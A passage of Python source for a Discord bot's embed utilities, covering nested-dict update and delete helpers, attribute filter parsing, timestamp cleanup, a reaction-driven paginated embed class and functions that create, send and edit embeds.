            old_dict[key] = merged
        else:
            if value == skip_value:
                continue
            if key not in old_dict and not add_new_keys:
                continue
            old_dict[key] = value
    return old_dict
def recursive_delete(
    old_dict: dict,
    update_dict: Optional[Mapping],
    skip_value: str = "\0",
    inverse: bool = False,
):
    """
    Delete embed dictionary attributes present in another,
    But recursively do the same dictionary values that are dictionaries as well.
    When ``inverse`` is True the logic flips: keys NOT named in
    ``update_dict`` are the ones deleted. Values equal to ``skip_value``
    are always left untouched. Returns ``old_dict`` (mutated in place).
    based on the answers in
    https://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth
    """
    if inverse:
        # Inverse mode: keep only what update_dict mentions. Iterate over a
        # snapshot (tuple) because we delete from old_dict while looping.
        for k, v in tuple(old_dict.items()):
            if isinstance(v, Mapping):
                lower_update_dict = None
                if isinstance(update_dict, dict):
                    lower_update_dict = update_dict.get(k, {})
                # Recurse first so nested deletions happen regardless of
                # what we decide about this level's key.
                new_value = recursive_delete(
                    v, lower_update_dict, skip_value=skip_value, inverse=inverse
                )
                if (
                    new_value != skip_value
                    and isinstance(update_dict, dict)
                    and k not in update_dict
                ):
                    old_dict[k] = new_value
                    # Prune sub-dicts that ended up empty.
                    if not new_value:
                        del old_dict[k]
            else:
                # Leaf value: delete it unless it is protected by
                # skip_value or explicitly listed in update_dict.
                if (
                    v != skip_value
                    and isinstance(update_dict, dict)
                    and k not in update_dict
                ):
                    del old_dict[k]
    else:
        # Normal mode: delete from old_dict every key that update_dict
        # names (recursively for nested mappings).
        for k, v in update_dict.items():
            if isinstance(v, Mapping):
                new_value = recursive_delete(
                    old_dict.get(k, {}), v, skip_value=skip_value
                )
                if new_value != skip_value and k in old_dict:
                    old_dict[k] = new_value
                    # Prune sub-dicts that ended up empty.
                    if not new_value:
                        del old_dict[k]
            else:
                if v != skip_value and k in old_dict:
                    del old_dict[k]
    return old_dict
def create_embed_mask_dict(
    attributes: str = "",
    allow_system_attributes: bool = False,
    fields_as_field_dict: bool = False,
):
    """
    Parse a whitespace-separated embed attribute filter string (e.g.
    ``"title author.name fields.0.value"``) into a nested "mask" dictionary
    describing which embed attributes were selected (leaf values are None).

    Args:
        attributes (str): The filter string. Dotted paths select
            sub-attributes (at most 3 levels); ``fields`` additionally
            supports numeric indices, ``(start,stop[,step])`` ranges and
            bare sub-attribute names (``fields.name`` etc.).
        allow_system_attributes (bool): Whether attributes belonging to
            EMBED_SYSTEM_ATTRIBUTES_SET may be selected.
        fields_as_field_dict (bool): If True, keep ``fields`` as a dict
            keyed by stringified index instead of converting it to a list.

    Raises:
        ValueError: On any malformed or conflicting attribute path.
    """
    # shallow-copy the module-level mask template so it is never mutated
    embed_top_level_attrib_dict = EMBED_TOP_LEVEL_ATTRIBUTES_MASK_DICT
    embed_top_level_attrib_dict = {
        k: embed_top_level_attrib_dict[k].copy()
        if isinstance(embed_top_level_attrib_dict[k], dict)
        else embed_top_level_attrib_dict[k]
        for k in embed_top_level_attrib_dict
    }
    # NOTE(review): system_attribs_dict is copied here but never used again
    # in this function — confirm whether it can be removed
    system_attribs_dict = EMBED_SYSTEM_ATTRIBUTES_MASK_DICT
    system_attribs_dict = {
        k: system_attribs_dict[k].copy()
        if isinstance(system_attribs_dict[k], dict)
        else system_attribs_dict[k]
        for k in system_attribs_dict
    }
    all_system_attribs_set = EMBED_SYSTEM_ATTRIBUTES_SET
    embed_mask_dict = {}
    attribs = attributes
    # each element is either a plain attribute name (str) or, when the `.`
    # operator was used, a list of path components
    attribs_tuple = tuple(
        attr_str.split(sep=".") if "." in attr_str else attr_str
        for attr_str in attribs.split()
    )
    # "0".."24" are valid names too, as field indices (25-field limit)
    all_attribs_set = EMBED_ATTRIBUTES_SET | set(str(i) for i in range(25))
    attribs_with_sub_attribs = EMBED_ATTRIBUTES_WITH_SUB_ATTRIBUTES_SET
    for attr in attribs_tuple:
        if isinstance(attr, list):  # a dotted path like "fields.0.name"
            if len(attr) > 3:
                raise ValueError(
                    "Invalid embed attribute filter string!"
                    " Sub-attributes do not propagate beyond 3 levels.",
                )
            bottom_dict = {}
            for i in range(len(attr)):
                if attr[i] not in all_attribs_set:
                    # an unknown name is only tolerated directly below
                    # "fields" when it looks like a parenthesized range
                    if i == 1:
                        if (
                            attr[i - 1] == "fields"
                            and "(" not in attr[i]
                            and ")" not in attr[i]
                        ):
                            raise ValueError(
                                f"`{attr[i]}` is not a valid embed (sub-)attribute name!",
                            )
                    else:
                        raise ValueError(
                            f"`{attr[i]}` is not a valid embed (sub-)attribute name!",
                        )
                elif attr[i] in all_system_attribs_set and not allow_system_attributes:
                    raise ValueError(
                        f"The given attribute `{attr[i]}` cannot be retrieved when `system_attributes=`"
                        " is set to `False`.",
                    )
                if not i:  # root component of the path
                    # the same name appearing as a plain (non-dotted)
                    # attribute elsewhere in the string is a conflict
                    if attribs_tuple.count(attr[i]):
                        raise ValueError(
                            "Invalid embed attribute filter string!"
                            f" Top level embed attribute `{attr[i]}` conflicts with its"
                            " preceding instances.",
                        )
                    elif attr[i] not in attribs_with_sub_attribs:
                        raise ValueError(
                            "Invalid embed attribute filter string!"
                            f" The embed attribute `{attr[i]}` does not have any sub-attributes!",
                        )
                    if attr[i] not in embed_mask_dict:
                        embed_mask_dict[attr[i]] = bottom_dict
                    else:
                        bottom_dict = embed_mask_dict[attr[i]]
                elif i == 1 and attr[i - 1] == "fields" and not attr[i].isnumeric():
                    if attr[i].startswith("(") and attr[i].endswith(")"):
                        # NOTE(review): this inner check can never be true,
                        # given the enclosing condition — looks like leftover
                        # validation; confirm before removing
                        if not attr[i].startswith("(") and not attr[i].endswith(")"):
                            raise ValueError(
                                "Invalid embed attribute filter string!"
                                " Embed field ranges should only contain integers"
                                " and should be structured like this: "
                                "`fields.(start, stop[, step]).attribute`",
                            )
                        # strip the surrounding parentheses and split on commas
                        field_str_range_list = [v for v in attr[i][1:][:-1].split(",")]
                        field_range_list = []
                        for j in range(len(field_str_range_list)):
                            # NOTE(review): the second clause accepts ANY first
                            # character (presumably meant for a sign); int()
                            # will still raise on e.g. "x5" — confirm
                            if (
                                field_str_range_list[j].isnumeric()
                                or len(field_str_range_list[j]) > 1
                                and field_str_range_list[j][1:].isnumeric()
                            ):
                                field_range_list.append(int(field_str_range_list[j]))
                            else:
                                raise ValueError(
                                    "Invalid embed attribute filter string!"
                                    " Embed field ranges should only contain integers"
                                    " and should be structured like this: "
                                    "`fields.(start, stop[, step]).attribute`",
                                )
                        sub_attrs = []
                        if attr[i] == attr[-1]:
                            # the range is the last path component: select
                            # all three field sub-attributes
                            sub_attrs.extend(("name", "value", "inline"))

                        elif attr[-1] in ("name", "value", "inline"):
                            sub_attrs.append(attr[-1])

                        else:
                            raise ValueError(
                                f"`{attr[-1]}` is not a valid embed (sub-)attribute name!",
                            )

                        field_range = range(*field_range_list)
                        if not field_range:
                            raise ValueError(
                                "Invalid embed attribute filter string!"
                                " Empty field range!",
                            )
                        for j in range(*field_range_list):
                            str_idx = str(j)
                            if str_idx not in embed_mask_dict["fields"]:
                                embed_mask_dict["fields"][str_idx] = {
                                    sub_attr: None for sub_attr in sub_attrs
                                }
                            else:
                                for sub_attr in sub_attrs:
                                    embed_mask_dict["fields"][str_idx][sub_attr] = None

                        break  # the remaining path components were consumed

                    elif attr[i] in ("name", "value", "inline"):
                        # "fields.name" etc.: select that sub-attribute on
                        # every possible field index
                        for sub_attr in ("name", "value", "inline"):
                            if attr[i] == sub_attr:
                                for j in range(25):
                                    str_idx = str(j)
                                    if str_idx not in embed_mask_dict["fields"]:
                                        embed_mask_dict["fields"][str_idx] = {
                                            sub_attr: None
                                        }
                                    else:
                                        embed_mask_dict["fields"][str_idx][
                                            sub_attr
                                        ] = None
                                break
                        else:
                            raise ValueError(
                                "Invalid embed attribute filter string!"
                                f" The given attribute `{attr[i]}` is not an attribute of an embed field!",
                            )
                        break
                    else:
                        raise ValueError(
                            "Invalid embed attribute filter string!"
                            " Embed field attibutes must be either structutred like"
                            " `fields.0`, `fields.0.attribute`, `fields.attribute` or"
                            " `fields.(start,stop[,step]).attribute`. Note that embed"
                            " field ranges cannot contain whitespace.",
                        )
                elif i == len(attr) - 1:  # leaf of the path
                    if attr[i] not in bottom_dict:
                        bottom_dict[attr[i]] = None
                else:  # intermediate component: descend, creating if needed
                    if attr[i] not in embed_mask_dict[attr[i - 1]]:
                        bottom_dict = {}
                        embed_mask_dict[attr[i - 1]][attr[i]] = bottom_dict
                    else:
                        bottom_dict = embed_mask_dict[attr[i - 1]][attr[i]]

        elif attr in embed_top_level_attrib_dict:  # plain top-level name
            if attribs_tuple.count(attr) > 1:
                raise ValueError(
                    "Invalid embed attribute filter string!"
                    " Do not specify top level embed attributes"
                    f" twice when not using the `.` operator: `{attr}`",
                )
            elif attr in all_system_attribs_set and not allow_system_attributes:
                raise ValueError(
                    f"The given attribute `{attr}` cannot be retrieved when `system_attributes=`"
                    " is set to `False`.",
                )

            if attr not in embed_mask_dict:
                embed_mask_dict[attr] = None
            else:
                raise ValueError(
                    "Invalid embed attribute filter string!"
                    " Do not specify upper level embed attributes twice!",
                )

        else:
            raise ValueError(
                f"Invalid top level embed attribute name `{attr}`!",
            )

    if not fields_as_field_dict and "fields" in embed_mask_dict:
        # convert the index-keyed field mask into an ordered list
        embed_mask_dict["fields"] = [
            embed_mask_dict["fields"][i]
            for i in sorted(embed_mask_dict["fields"].keys())
        ]

    return embed_mask_dict
def copy_embed(embed: discord.Embed):
    """Return an independent deep-ish copy of the given embed by
    round-tripping it through its dictionary representation."""
    embed_data = embed.to_dict()
    return discord.Embed.from_dict(embed_data)
def handle_embed_dict_timestamp(embed_dict: dict):
    """
    Normalize the "timestamp" entry of an embed dictionary in place.

    A string value is kept (with one trailing "Z" stripped) only if it
    parses as an ISO timestamp; a ``datetime`` is converted to its ISO
    string; any other value, or an unparsable string, is removed.

    Args:
        embed_dict (dict): The embed dictionary (mutated in place).

    Returns:
        dict: The same dictionary.
    """
    if "timestamp" not in embed_dict:
        return embed_dict

    timestamp = embed_dict["timestamp"]
    if isinstance(timestamp, str):
        stripped = timestamp.removesuffix("Z")
        try:
            datetime.datetime.fromisoformat(stripped)
        except ValueError:
            del embed_dict["timestamp"]
        else:
            embed_dict["timestamp"] = stripped
    elif isinstance(timestamp, datetime.datetime):
        embed_dict["timestamp"] = timestamp.isoformat()
    else:
        del embed_dict["timestamp"]
    return embed_dict
def copy_embed_dict(embed_dict: dict):
    """
    Copy an embed dictionary one level deep, so that nested attribute
    dicts and the list of field dicts are not shared with the original.

    Prevents shared-reference bugs between the outputs of
    ``discord.Embed.to_dict()``.
    """
    copied = {}
    for key, value in embed_dict.items():
        copied[key] = value.copy() if isinstance(value, dict) else value

    if "fields" in embed_dict:
        copied["fields"] = [dict(field) for field in embed_dict["fields"]]
    return copied
def get_fields(*strings: str):
    """
    Get a list of embed fields from the given message strings.

    Syntax of an embed field string: <name|value[|inline]>

    Args:
        *strings (str): The messages to get the fields from

    Returns:
        list[list[str, str, bool]]: One [name, value, inline] list per
        parsed field, across all input strings.
    """
    # syntax: <Title|desc.[|inline=False]>
    field_regex = r"(<.*\|.*(\|True|\|False|\|1|\|0|)>)"
    truthy_markers = ("", "True", "1")
    parsed_fields = []

    for message in strings:
        # re.split with capturing groups also yields the matched fields
        for chunk in re.split(field_regex, message):
            if not chunk:
                continue
            inner = chunk.strip()[1:-1]  # drop the surrounding < and >
            parts: list[Any] = inner.split("|")
            if len(parts) == 2:
                parts.append("")
            elif len(parts) != 3:
                continue
            parts[2] = parts[2] in truthy_markers
            parsed_fields.append(parts)

    return parsed_fields
class PagedEmbed:
    """A multi-page embed attached to a message, controlled via reactions."""

    def __init__(
        self,
        message: discord.Message,
        pages: list[discord.Embed],
        caller: Optional[discord.Member] = None,
        command: Optional[str] = None,
        start_page: int = 0,
    ):
        """
        Create an embed which can be controlled by reactions. The footer of the
        embeds will be overwritten. If the optional "command" argument
        is set the embed page will be refreshable. The pages argument must
        have at least one embed.

        Args:
            message (discord.Message): The message to overwrite. For commands,
                it would be self.response_msg

            pages (list[discord.Embed]): The list of embeds to change
                pages between

            caller (Optional[discord.Member]): The user that can control
                the embed. Defaults to None (everyone can control it).

            command (Optional[str]): Optional argument to support pg!refresh.
                Defaults to None.

            start_page (int): The page to start from. Defaults to 0.
        """
        self.pages = pages
        self.current_page = start_page
        self.message = message
        self.parent_command = command
        self.is_on_info = False  # whether the info page is currently displayed

        # control name -> (emoji, description); an empty emoji string
        # means that control is disabled
        self.control_emojis = {
            "first": ("", ""),
            "prev": ("◀️", "Go to the previous page"),
            "stop": ("⏹️", "Deactivate the buttons"),
            "info": ("ℹ️", "Show this information page"),
            "next": ("▶️", "Go to the next page"),
            "last": ("", ""),
        }

        # jump-to-first/last controls are only offered with 3+ pages
        if len(self.pages) >= 3:
            self.control_emojis["first"] = ("⏪", "Go to the first page")
            self.control_emojis["last"] = ("⏩", "Go to the last page")

        self.killed = False
        self.caller = caller

        self.help_text = ""
        for emoji, desc in self.control_emojis.values():
            if emoji:
                self.help_text += f"{emoji}: {desc}\n"

    async def add_control_emojis(self):
        """Add the control reactions to the message."""
        for emoji in self.control_emojis.values():
            if emoji[0]:
                await self.message.add_reaction(emoji[0])

    async def handle_reaction(self, reaction: str):
        """Handle a reaction."""
        if reaction == self.control_emojis.get("next")[0]:
            await self.set_page(self.current_page + 1)

        if reaction == self.control_emojis.get("prev")[0]:
            await self.set_page(self.current_page - 1)

        if reaction == self.control_emojis.get("first")[0]:
            await self.set_page(0)

        if reaction == self.control_emojis.get("last")[0]:
            await self.set_page(len(self.pages) - 1)

        if reaction == self.control_emojis.get("stop")[0]:
            self.killed = True

        if reaction == self.control_emojis.get("info")[0]:
            await self.show_info_page()

    async def show_info_page(self):
        """Create and show the info page."""
        # toggles between the info page and the current content page
        self.is_on_info = not self.is_on_info
        if self.is_on_info:
            info_page_embed = create(description=self.help_text)
            footer = self.get_footer_text(self.current_page)
            info_page_embed.set_footer(text=footer)
            await self.message.edit(embed=info_page_embed)
        else:
            await self.message.edit(embed=self.pages[self.current_page])

    async def set_page(self, num: int):
        """Set the current page and display it."""
        self.is_on_info = False
        # modulo wraps navigation around at both ends
        self.current_page = num % len(self.pages)
        await self.message.edit(embed=self.pages[self.current_page])

    async def setup(self):
        """Validate the pages, write footers and attach the control
        reactions. Returns True when the pagination loop should run."""
        if not self.pages:
            await replace(
                self.message,
                title="Internal error occured!",
                description="Got empty embed list for PagedEmbed",
                color=0xFF0000,
            )
            return False

        if len(self.pages) == 1:
            # a single page needs no reaction controls
            await self.message.edit(embed=self.pages[0])
            return False

        for i, page in enumerate(self.pages):
            footer = self.get_footer_text(i)
            page.set_footer(text=footer)

        await self.message.edit(embed=self.pages[self.current_page])
        await self.add_control_emojis()
        return True

    def get_footer_text(self, page_num: int):
        """Get the information footer text, which contains the current page."""
        footer = f"Page {page_num + 1} of {len(self.pages)}.\n"

        if self.parent_command:
            footer += "Refresh by replying to this message with `pg!refresh`\n"
            footer += f"Command: {self.parent_command}"

        return footer

    async def check(self, event):
        """Check if the event from "raw_reaction_add" can be passed down to `handle_rection`"""
        if event.member.bot:
            return False

        # clear the user's reaction so the "button" can be pressed again
        await self.message.remove_reaction(str(event.emoji), event.member)
        if self.caller and self.caller.id != event.user_id:
            # non-callers may still control the embed if they hold an
            # admin role (and the bot is not running in generic mode)
            for role in event.member.roles:
                if not common.GENERIC and role.id in common.ServerConstants.ADMIN_ROLES:
                    break
            else:
                return False

        return event.message_id == self.message.id

    async def mainloop(self):
        """Start the mainloop. This checks for reactions and handles them."""
        if not await self.setup():
            return

        while not self.killed:
            try:
                event = await common.bot.wait_for("raw_reaction_add", timeout=60)

                if await self.check(event):
                    await self.handle_reaction(str(event.emoji))
            except asyncio.TimeoutError:
                # no interaction for 60 seconds: deactivate the paginator
                self.killed = True

        await self.message.clear_reactions()
def parse_condensed_embed_list(embed_list: Union[list, tuple]):
    """
    Parse the condensed embed list syntax used in some embed creation
    commands. The syntax is:
    [
        'author.name' or ('author.name', 'author.url') or ('author.name', 'author.url', 'icon.url'),   # embed author
        'title' or ('title', 'url') or ('title', 'url', 'thumbnail.url'),  # embed title, url, thumbnail
        '''desc.''' or ('''desc.''', 'image.url'),  # embed description, image
        0xabcdef, # or -1 for default embed color
        [ # embed fields
        '''
        <field.name|
        ...field.value....
        |field.inline>
        ''',
        ],
        'footer.text' or ('footer.text', 'footer.icon_url'), # embed footer
        datetime(year, month, day[, hour[, minute[, second[, microsecond]]]]) or '2021-04-17T17:36:00.553' # embed timestamp
    ]

    The list must contain at least 1 element.

    Returns:
        dict: Keyword arguments suitable for `create()`/`create_as_dict()`.

    Raises:
        ValueError: When the structure of `embed_list` does not match the
            syntax above.
        TypeError: When an element that should be a string is not (the
            `+ ""` concatenations deliberately act as string type checks).
    """
    arg_count = len(embed_list)

    embed_args = {}

    if arg_count > 0:
        # author: 'name' or (name[, url[, icon_url]])
        if isinstance(embed_list[0], (tuple, list)):
            if len(embed_list[0]) == 3:
                embed_args.update(
                    author_name=embed_list[0][0] + "",
                    # BUGFIX: author_url previously read index 0 (the name)
                    author_url=embed_list[0][1] + "",
                    author_icon_url=embed_list[0][2] + "",
                )
            elif len(embed_list[0]) == 2:
                embed_args.update(
                    author_name=embed_list[0][0] + "",
                    author_url=embed_list[0][1] + "",
                )
            elif len(embed_list[0]) == 1:
                embed_args.update(
                    author_name=embed_list[0][0] + "",
                )
            else:
                # BUGFIX: previously a tuple of invalid length fell through
                # to `tuple + ""` (TypeError) while a plain string author
                # raised ValueError, contradicting the documented syntax
                raise ValueError(
                    f"Invalid arguments! The condensed embed syntax is: ```\n{CONDENSED_EMBED_DATA_LIST_SYNTAX}\n```"
                )
        else:
            # plain string: just the author name
            embed_args.update(
                author_name=embed_list[0] + "",
            )

    if arg_count > 1:
        # title: 'title' or (title[, url[, thumbnail_url]])
        if isinstance(embed_list[1], (tuple, list)):
            if len(embed_list[1]) == 3:
                embed_args.update(
                    title=embed_list[1][0] + "",
                    url=embed_list[1][1] + "",
                    thumbnail_url=embed_list[1][2] + "",
                )
            elif len(embed_list[1]) == 2:
                embed_args.update(
                    title=embed_list[1][0] + "",
                    url=embed_list[1][1] + "",
                )
            elif len(embed_list[1]) == 1:
                embed_args.update(
                    title=embed_list[1][0] + "",
                )
        else:
            embed_args.update(
                title=embed_list[1] + "",
            )

    if arg_count > 2:
        # description: 'desc' or (desc[, image_url])
        if isinstance(embed_list[2], (tuple, list)):
            if len(embed_list[2]) == 2:
                embed_args.update(
                    description=embed_list[2][0] + "",
                    image_url=embed_list[2][1] + "",
                )
            elif len(embed_list[2]) == 1:
                embed_args.update(
                    description=embed_list[2][0] + "",
                )
        else:
            embed_args.update(
                description=embed_list[2] + "",
            )

    if arg_count > 3:
        # color: -1 means "use the default"; `+ 0` type-checks for a number
        if embed_list[3] > -1:
            embed_args.update(
                color=embed_list[3] + 0,
            )

    if arg_count > 4:
        try:
            fields = get_fields(*embed_list[4])
            embed_args.update(fields=fields)
        except TypeError:
            raise ValueError(
                "Invalid format for field string(s) in the condensed embed syntax!"
                'The format should be `"<name|value|inline>"`'
            )

    if arg_count > 5:
        # footer: 'text' or (text[, icon_url])
        if isinstance(embed_list[5], (tuple, list)):
            if len(embed_list[5]) == 2:
                embed_args.update(
                    footer_text=embed_list[5][0] + "",
                    footer_icon_url=embed_list[5][1] + "",
                )
            elif len(embed_list[5]) == 1:
                embed_args.update(
                    footer_text=embed_list[5][0] + "",
                )
        else:
            embed_args.update(
                footer_text=embed_list[5] + "",
            )

    if arg_count > 6:
        embed_args.update(timestamp=embed_list[6] + "")

    return embed_args
def create_as_dict(
    author_name=EmptyEmbed,
    author_url=EmptyEmbed,
    author_icon_url=EmptyEmbed,
    title=EmptyEmbed,
    url=EmptyEmbed,
    thumbnail_url=EmptyEmbed,
    description=EmptyEmbed,
    image_url=EmptyEmbed,
    color=-1,
    fields=(),
    footer_text=EmptyEmbed,
    footer_icon_url=EmptyEmbed,
    timestamp=EmptyEmbed,
):
    """
    Build an embed dictionary from the given embed attributes, omitting
    everything that was left unset or empty.

    Fields may be dictionaries with "name"/"value"/"inline" keys or
    3-element sequences; field entries that end up empty are skipped.
    A ``color`` of -1 means "no color"; out-of-range colors fall back to
    the module default.
    """
    embed_dict = {}

    author = {}
    if author_name:
        author["name"] = author_name
    if author_url:
        author["url"] = author_url
    if author_icon_url:
        author["icon_url"] = author_icon_url
    if author:
        embed_dict["author"] = author

    footer = {}
    if footer_text:
        footer["text"] = footer_text
    if footer_icon_url:
        footer["icon_url"] = footer_icon_url
    if footer:
        embed_dict["footer"] = footer

    if title:
        embed_dict["title"] = title
    if url:
        embed_dict["url"] = url
    if description:
        embed_dict["description"] = description

    if color != -1:
        in_range = 0 <= color < 0x1000000
        embed_dict["color"] = int(color) if in_range else DEFAULT_EMBED_COLOR

    if timestamp:
        if isinstance(timestamp, str):
            # keep the string as given, but only if it parses as ISO
            # (one trailing "Z" is tolerated during validation)
            stripped = timestamp[:-1] if timestamp.endswith("Z") else timestamp
            try:
                datetime.datetime.fromisoformat(stripped)
            except ValueError:
                pass
            else:
                embed_dict["timestamp"] = timestamp
        elif isinstance(timestamp, datetime.datetime):
            embed_dict["timestamp"] = timestamp.isoformat()

    if image_url:
        embed_dict["image"] = {"url": image_url}
    if thumbnail_url:
        embed_dict["thumbnail"] = {"url": thumbnail_url}

    if fields:
        fields_list = []
        embed_dict["fields"] = fields_list
        for field in fields:
            name = value = inline = None
            if isinstance(field, dict):
                name = field.get("name", "")
                value = field.get("value", "")
                inline = field.get("inline", "")
            elif isinstance(field, (list, tuple)) and len(field) == 3:
                name, value, inline = field

            entry = {}
            if name:
                entry["name"] = name
            if value:
                entry["value"] = value
            if inline in (False, True):
                entry["inline"] = inline
            if entry:
                fields_list.append(entry)

    return embed_dict
def validate_embed_dict(embed_dict: dict):
    """
    Checks if an embed dictionary can produce
    a viable embed on Discord.

    Args:
        embed_dict: The target embed dictionary

    Returns:
        A boolean indicating the validity of the
        given input dictionary.
    """
    if not embed_dict:
        return False

    # an embed consisting only of a color and/or timestamp renders empty
    if not set(embed_dict).difference(("color", "timestamp")):
        return False

    for k, value in embed_dict.items():
        # every present attribute must be non-empty
        if not value:
            return False
        if k == "footer" and "text" not in value:
            return False
        if k == "author" and "name" not in value:
            return False
        if k in ("thumbnail", "image") and "url" not in value:
            return False
        if k == "fields":
            # every field needs its mandatory name and value keys
            if any("name" not in f or "value" not in f for f in value):
                return False
        elif k == "color":
            # BUGFIX: a non-integer color previously raised TypeError
            # instead of reporting the dict as invalid
            if not isinstance(value, int) or not 0 <= value <= 0xFFFFFF:
                return False
        elif k == "timestamp":
            # BUGFIX: a non-string timestamp previously raised TypeError;
            # a trailing "Z" is now tolerated, consistent with
            # handle_embed_dict_timestamp() and create()
            if not isinstance(value, str):
                return False
            try:
                datetime.datetime.fromisoformat(
                    value[:-1] if value.endswith("Z") else value
                )
            except ValueError:
                return False
    return True
def clean_embed_dict(embed_dict: dict):
    """
    Remove unrenderable attributes from an embed dictionary in place and
    normalize those that can be repaired.

    - Falsy values and incomplete author/footer/thumbnail/image dicts
      are deleted.
    - Fields missing their "name" or "value" keys are dropped.
    - "color" is clamped to the valid 0..0xFFFFFF range.
    - "timestamp" is normalized like handle_embed_dict_timestamp(): a
      valid ISO string is kept (trailing "Z" stripped), a datetime is
      converted to its ISO string, anything else is deleted.

    Args:
        embed_dict: The embed dictionary to clean (mutated in place).

    Returns:
        The same dictionary.
    """
    # snapshot the keys, since entries may be deleted while iterating
    for k in tuple(embed_dict.keys()):
        value = embed_dict[k]
        if (
            not value
            or k == "footer"
            and "text" not in value
            or k == "author"
            and "name" not in value
            or k in ("thumbnail", "image")
            and "url" not in value
        ):
            del embed_dict[k]
        elif k == "fields":
            # iterate in reverse so pops don't shift pending indices;
            # the existing list object is mutated in place on purpose
            for i in reversed(range(len(value))):
                if "name" not in value[i] or "value" not in value[i]:
                    value.pop(i)
        elif k == "color":
            embed_dict["color"] = min(max(0, value), 0xFFFFFF)
        elif k == "timestamp":
            # BUGFIX: a datetime (or any non-string) timestamp previously
            # crashed fromisoformat with TypeError, and "Z"-suffixed
            # strings were handled inconsistently with the other
            # timestamp helpers in this module
            if isinstance(value, str):
                final_timestamp = value[:-1] if value.endswith("Z") else value
                try:
                    datetime.datetime.fromisoformat(final_timestamp)
                    embed_dict["timestamp"] = final_timestamp
                except ValueError:
                    del embed_dict["timestamp"]
            elif isinstance(value, datetime.datetime):
                embed_dict["timestamp"] = value.isoformat()
            else:
                del embed_dict["timestamp"]
    return embed_dict
def create(
    author_name=EmptyEmbed,
    author_url=EmptyEmbed,
    author_icon_url=EmptyEmbed,
    title=EmptyEmbed,
    url=EmptyEmbed,
    thumbnail_url=EmptyEmbed,
    description=EmptyEmbed,
    image_url=EmptyEmbed,
    color=0xFFFFAA,
    fields=(),
    footer_text=EmptyEmbed,
    footer_icon_url=EmptyEmbed,
    timestamp=EmptyEmbed,
):
    """
    Creates an embed with a much more tight function.

    Unset (EmptyEmbed) attributes are omitted. `color` falls back to
    DEFAULT_EMBED_COLOR when outside the 24-bit range. `timestamp` may be
    an ISO string (a trailing "Z" is stripped) or a datetime; unparsable
    strings are silently ignored. Each entry in `fields` is either a dict
    with "name"/"value"/"inline" keys or a (name, value, inline) sequence.
    """
    embed = discord.Embed(
        title=title,
        url=url,
        description=description,
        color=color if 0 <= color < 0x1000000 else DEFAULT_EMBED_COLOR,
    )

    if timestamp:
        if isinstance(timestamp, str):
            try:
                # strip one trailing "Z", which fromisoformat may reject
                embed.timestamp = datetime.datetime.fromisoformat(
                    timestamp[:-1] if timestamp.endswith("Z") else timestamp
                )
            except ValueError:
                # invalid timestamp strings are deliberately ignored
                pass
        elif isinstance(timestamp, datetime.datetime):
            embed.timestamp = timestamp

    if author_name:
        embed.set_author(name=author_name, url=author_url, icon_url=author_icon_url)

    if thumbnail_url:
        embed.set_thumbnail(url=thumbnail_url)

    if image_url:
        embed.set_image(url=image_url)

    for field in fields:
        if isinstance(field, dict):
            embed.add_field(
                name=field.get("name", ""),
                value=field.get("value", ""),
                inline=field.get("inline", True),
            )
        else:
            # sequence form: (name, value, inline)
            embed.add_field(name=field[0], value=field[1], inline=field[2])

    if footer_text:
        embed.set_footer(text=footer_text, icon_url=footer_icon_url)

    return embed
async def send(
    channel: common.Channel,
    author_name=EmptyEmbed,
    author_url=EmptyEmbed,
    author_icon_url=EmptyEmbed,
    title=EmptyEmbed,
    url=EmptyEmbed,
    thumbnail_url=EmptyEmbed,
    description=EmptyEmbed,
    image_url=EmptyEmbed,
    color=0xFFFFAA,
    fields=[],
    footer_text=EmptyEmbed,
    footer_icon_url=EmptyEmbed,
    timestamp=EmptyEmbed,
):
    """
    Build an embed from the given attributes (see `create()`) and send
    it to the given channel, returning the sent message.
    """
    new_embed = create(
        author_name=author_name,
        author_url=author_url,
        author_icon_url=author_icon_url,
        title=title,
        url=url,
        thumbnail_url=thumbnail_url,
        description=description,
        image_url=image_url,
        color=color,
        fields=fields,
        footer_text=footer_text,
        footer_icon_url=footer_icon_url,
        timestamp=timestamp,
    )
    return await channel.send(embed=new_embed)
async def replace(
    message: discord.Message,
    author_name=EmptyEmbed,
    author_url=EmptyEmbed,
    author_icon_url=EmptyEmbed,
    title=EmptyEmbed,
    url=EmptyEmbed,
    thumbnail_url=EmptyEmbed,
    description=EmptyEmbed,
    image_url=EmptyEmbed,
    color=0xFFFFAA,
    fields=[],
    footer_text=EmptyEmbed,
    footer_icon_url=EmptyEmbed,
    timestamp=EmptyEmbed,
):
    """
    Build an embed from the given attributes (see `create()`) and
    replace the embed of the given message with it.
    """
    new_embed = create(
        author_name=author_name,
        author_url=author_url,
        author_icon_url=author_icon_url,
        title=title,
        url=url,
        thumbnail_url=thumbnail_url,
        description=description,
        image_url=image_url,
        color=color,
        fields=fields,
        footer_text=footer_text,
        footer_icon_url=footer_icon_url,
        timestamp=timestamp,
    )
    return await message.edit(embed=new_embed)
async def edit(
    message: discord.Message,
    embed: discord.Embed,
    author_name=EmptyEmbed,
    author_url=EmptyEmbed,
    author_icon_url=EmptyEmbed,
    title=EmptyEmbed,
    url=EmptyEmbed,
    thumbnail_url=EmptyEmbed,
    description=EmptyEmbed,
    image_url=EmptyEmbed,
    color=-1,
    fields=[],
    footer_text=EmptyEmbed,
    footer_icon_url=EmptyEmbed,
    timestamp=EmptyEmbed,
    add_attributes=False,
    inner_fields: bool = False,
):
    """
    Updates the changed attributes of the embed of a message with a
    much more tight function

    Only the attributes given non-empty values are merged into the
    embed's existing data. If `message` is None, the merged embed is
    returned instead of editing a message.

    Args:
        add_attributes: whether attributes the old embed lacks may be
            added, instead of only updating existing ones.
        inner_fields: merge fields index-by-index instead of treating
            the whole field list as one value.
    """
    old_embed_dict = embed.to_dict()
    update_embed_dict = create_as_dict(
        author_name=author_name,
        author_url=author_url,
        author_icon_url=author_icon_url,
        title=title,
        url=url,
        thumbnail_url=thumbnail_url,
        description=description,
        image_url=image_url,
        color=color,
        fields=fields,
        footer_text=footer_text,
        footer_icon_url=footer_icon_url,
        timestamp=timestamp,
    )

    if inner_fields:
        # recursive_update merges dicts, not lists: re-key both field
        # lists by stringified index so fields merge positionally
        if "fields" in old_embed_dict:
            old_embed_dict["fields"] = {
                str(i): old_embed_dict["fields"][i]
                for i in range(len(old_embed_dict["fields"]))
            }
        if "fields" in update_embed_dict:
            update_embed_dict["fields"] = {
                str(i): update_embed_dict["fields"][i]
                for i in range(len(update_embed_dict["fields"]))
            }

    # empty strings act as the "no change" sentinel here
    recursive_update(
